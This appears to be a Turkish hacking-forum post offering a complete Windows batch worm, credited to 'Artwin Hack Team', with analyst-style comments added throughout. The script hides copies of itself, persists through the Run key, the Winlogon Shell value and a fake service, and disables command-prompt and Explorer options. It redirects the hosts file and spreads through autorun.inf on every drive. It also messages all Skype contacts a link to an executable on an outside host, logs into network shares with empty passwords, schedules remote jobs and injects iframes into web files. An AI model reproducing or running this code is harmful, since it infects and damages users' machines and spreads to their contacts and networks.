yeni çIkan sÜper bİ TrojAn (google) _kOd_...

kilyos06@

ArtwiN HacK TeaM
@echo off & break off
rem Analysis note: Windows batch sample. Everything between the :loop label and
rem the later "goto loop" is repeated on every pass.
:loop
rem Staging: creates a "tmp" folder under the user profile and copies the
rem running script (%0) into it as Qsoft.bat.
if not exist "%userprofile%\tmp" mkdir "%userprofile%\tmp"
copy %0 "%userprofile%\tmp\Qsoft.bat"
rem Writes two VBScript files into that folder: tmp.vbs (a message box) and
rem stsyk.vbs (runs Qsoft.bat with window style 0, i.e. without a visible window).
echo msgbox("Visit
www.google.com.",16,"VISIT IT!") > "%userprofile%\tmp\tmp.vbs"
echo set shell = CreateObject("Wscript.Shell") >> "%userprofile%\tmp\stsyk.vbs"
echo shell.run "Qsoft.bat", 0 >> "%userprofile%\tmp\stsyk.vbs"
rem Marks the folder and the staged files hidden + system + read-only.
attrib +h +s +r "%userprofile%\tmp\stsyk.vbs"
attrib +h +s +r "%userprofile%\tmp"
attrib +h +s +r "%userprofile%\tmp\Qsoft.bat"
rem Second copy under system32 as taskmgr.bat (name presumably chosen to
rem resemble Task Manager), with the same attributes.
copy %0 %windir%\system32\taskmgr.bat
attrib +h +s +r %windir%\system32\taskmgr.bat
rem Sets the DisableCMD policy value (command-prompt restriction) machine-wide.
reg add HKLM\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
rem Autostart: HKLM Run value "rundll-drivers" pointing at tmp.vbs.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "rundll-drivers" /d "%userprofile%\tmp\tmp.vbs" /f
rem Explorer tampering for the current user: hide file extensions, do not show
rem hidden files, hide protected OS files, and set the NoFind / NoFolderOptions
rem policy values. Together these keep the hidden copies out of sight and remove
rem the UI normally used to reveal them; responders should expect to reset them.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t "REG_DWORD" /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFind" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t "REG_DWORD" /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v SuperHidden /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
rem Builds %windir%\system32\n32.reg line by line with service-style values
rem (display name "Windows Network Service", ImagePath = the staged Qsoft.bat,
rem ObjectName LocalSystem) and hands the file to REGEDIT /S (silent import).
rem Artifacts to look for: n32.reg and a service key with that display name.
echo "HKLM\SYSTEM\CurrentControlSet\Services\Windows network Service" >%windir%\system32\n32.reg
echo "Type"=dword:00000110 >>%windir%\system32\n32.reg
echo "Start"=dword:00000002 >>%windir%\system32\n32.reg
echo "ErrorControl"=dword:00000000 >>%windir%\system32\n32.reg
echo "ImagePath"="%userprofile%\tmp\Qsoft.bat" >>%windir%\system32\n32.reg
echo "DisplayName"="Windows Network Service" >>%windir%\system32\n32.reg
echo "ObjectName"="LocalSystem" >>%windir%\system32\n32.reg
echo "Description"="Windows Network Service" >>%windir%\system32\n32.reg
echo HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WINDOWS_REG_SERVICE\
0000\Control >>%windir%\system32\n32.reg
echo "*NewlyCreated*"=dword:00000000 >>%windir%\system32\n32.reg
echo "ActiveService"="Windows Network Service" >>%windir%\system32\n32.reg
REGEDIT /S %windir%\system32\n32.reg


rem Writes an Internet shortcut (0110005.url) to the user's Desktop, then copies
rem it under a random "<n>_Visit!!.url" name, into Favorites, and into a
rem "Qsoft" folder created under Program Files.
echo [InternetShortcut] > "%userprofile%\Desktop\0110005.url"
echo URL=http://www.google.com >> "%userprofile%\Desktop\0110005.url"
echo IDList= >> "%userprofile%\Desktop\0110005.url"
echo [{000214A0-0000-0000-C000-000000000046}] >> "%userprofile%\Desktop\0110005.url"
echo Prop3=19,2 >> "%userprofile%\Desktop\0110005.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\Desktop\%random%_Visit!!.url"
copy "%userprofile%\Desktop\0110005.url" "%userprofile%\favorites"
if not exist "%programfiles%\Qsoft" mkdir "%programfiles%\Qsoft"
copy "%userprofile%\Desktop\0110005.url" "%programfiles%\Qsoft"
rem Hosts-file tampering: appends entries that map google.com / www.google.com
rem to 216.146.36.97, so name resolution for those hosts is redirected locally.
rem Because the script loops, the entries are appended again on each pass;
rem review %windir%\system32\drivers\etc\hosts for unexpected lines.
echo 216.146.36.97 google.com >>"%windir%\system32\drivers\etc\hosts"
echo 216.146.36.97
www.google.com >>"%windir%\system32\drivers\etc\hosts"

rem Further copies under system32\drivers: the script as Qsoft.bat and the
rem stsyk.vbs launcher as syk.vbs, both marked hidden + system + read-only.
copy %0 %windir%\system32\drivers\Qsoft.bat
copy "%userprofile%\tmp\stsyk.vbs" %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\syk.vbs
attrib +h +s +r %windir%\system32\drivers\Qsoft.bat
rem Replaces the current user's ACL entry on both files with Read (CACLS /E /P).
CACLS %windir%\system32\drivers\syk.vbs /E /P %username%:R
CACLS %windir%\system32\drivers\Qsoft.bat /E /P %username%:R
rem Logon persistence: overwrites the Winlogon "Shell" value so that syk.vbs is
rem listed after explorer.exe. The expected value on a clean system is
rem explorer.exe alone, so any extra entry here is worth alerting on.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe,%windir%\system32\drivers\syk.vbs" /f
if exist "%userprofile%\desktop\desktop.ini" copy "%userprofile%\desktop\desktop.ini" %windir%\system32\drivers
rem Removable/fixed drive propagation: for every drive letter that exists,
rem drops a copy as bin.bat plus an autorun.inf that names bin.bat, both hidden.
rem Indicators: hidden autorun.inf + bin.bat in a drive root.
for %%g in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%g:\ (
copy %0 %%g:\bin.bat
echo [autorun] >%%g:\autorun.inf
echo open=bin.bat >>%%g:\autorun.inf
echo shellexecute=bin.bat >>%%g:\autorun.inf
echo shell\Explore\command=bin.bat >>%%g:\autorun.inf
echo shell\Open\command=bin.bat >>%%g:\autorun.inf
echo shell=Explore >>%%g:\autorun.inf
attrib +h +s +r %%g:\autorun.inf
attrib +h +s +r %%g:\bin.bat
)
)


rem Messaging-client propagation: writes %windir%\skype.vbs, a VBScript that
rem uses the Skype4COM automation object to attach to the client and send a
rem message containing a download link to every entry in the Friends list.
echo on error resume next >>%windir%\skype.vbs
echo set Fruxr = WScript.CreateObject("Skype4COM.Skype", "Skype_") >>%windir%\skype.vbs
echo Fruxr.Client.Start() >>%windir%\skype.vbs
echo Fruxr.Attach() >>%windir%\skype.vbs
echo For Each KZN In Fruxr.Friends >>%windir%\skype.vbs
echo Fruxr.SendMessage KZN.handle,"
http://h1.ripway.com/windowsgame/svchost.exe :D :D" >>%windir%\skype.vbs
echo next >>%windir%\skype.vbs
rem Launches the script, waits (ping used as a delay), issues kill commands for
rem the Skype process, then deletes the script, so skype.vbs is not expected
rem to remain on disk afterwards.
start %windir%\skype.vbs
ping localhost -n 15
tskill skype
taskkill /IM /F skype
del %windir%\skype.vbs

rem Network propagation. Collects the first column of "net view" output into
rem %windir%\teest.txt and iterates over it as a list of hosts.
for /f "tokens=1 delims= " %%f in ('net view ^| find " " ') do echo %%f >>%windir%\teest.txt
for /f %%g in (%windir%\teest.txt) do (

rem Attempts connections to the host and to its IPC$, admin$, print$ and c$
rem shares using the names admin / administrator / adm / current user, each
rem with an empty password. This only succeeds where such accounts exist with
rem no password; logon attempts on peers are a trace of this stage.
net use %%g /user:admin ""
net use %%g /user:administrator ""
net use %%g /user:%username% ""
net use %%g /user:%username% ""
net use %%g\IPC$ /user:administrator ""
net use %%g\admin$ /user:administrator ""
net use %%g\print$ /user:administrator ""
net use %%g\c$ /user:administrator ""
net use %%g\IPC$ /user:adm ""
net use %%g\admin$ /user:admin ""
net use %%g\print$ /user:admin ""
net use %%g\c$ /user:admin ""
rem Copies the script to those shares as funny.bat.
copy %0 %%g\IPC$\funny.bat
copy %0 %%g\C$\funny.bat
copy %0 %%g\admin$\funny.bat
copy %0 %%g\print$\funny.bat


rem Lists the host's shares into %windir%\input123.blp, copies the script into
rem each as readme.bat and <share>.bat, and issues AT commands (21:00, /EVERY:S)
rem against the host that reference the dropped copies. Artifacts: teest.txt,
rem input123.blp, funny.bat / readme.bat on shares, unexpected AT jobs.
for /f "tokens=1 delims= " %%a in ('net view %%g ^| find " " ') do echo %%a >>%windir%\input123.blp
for /f %%t in (%windir%\input123.blp) do (
copy %0 %%g\%%t\readme.bat
copy %0 %%g\%%t\%%t.bat
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\Admin$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\IPC$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\%%t\readme.bat
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\C$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\print$\funny.bat"
AT
\\%%g 21:00 /EVERY:S CMD /C "%%g\admin$\funny.bat"
)

)
rem Web-content tampering: writes a recursive directory listing (from the
rem current directory) to %windir%\tmp.log, then appends an iframe tag to
rem .html, .htm and .hta files found in the listed directories. Local web
rem content on an affected machine should be checked for a trailing iframe line.
dir /s /ad /b * >%windir%\tmp.log
for /f "tokens=1-5 delims=." %%I in (%windir%\tmp.log) do (
for %%t in (%%I\*.html) do (
echo ^<iframe src="
http://google.com"^> >>%%t
)
for %%b in (%%I\*.htm) do (
echo ^<iframe src="
http://google.com"^> >>%%b
)
for %%c in (%%I\*.hta) do (
echo ^<iframe src="
http://google.com"^> >>%%c
)
del %windir%\tmp.log
rem Picks a number from 1 to 45, uses ping to localhost as a delay of that
rem many echo requests, opens a URL with "start", and jumps back to :loop.
set /a ranz=%random%%%45+1
ping localhost -n %ranz%
start
http://google.com
goto loop
rem Appends a ":<username><random>" label line to the script file itself (%0).
rem NOTE(review): if executed this changes the file's content, so copies would
rem presumably not share one hash; confirm before relying on hash matching.
echo :%username%%random% >>%0



+Bence arşive ekleyin bi daha rastlamayabilir...



++BİR TEŞEKKÜRÜ ÇOOK GÖRMEYİN...++
 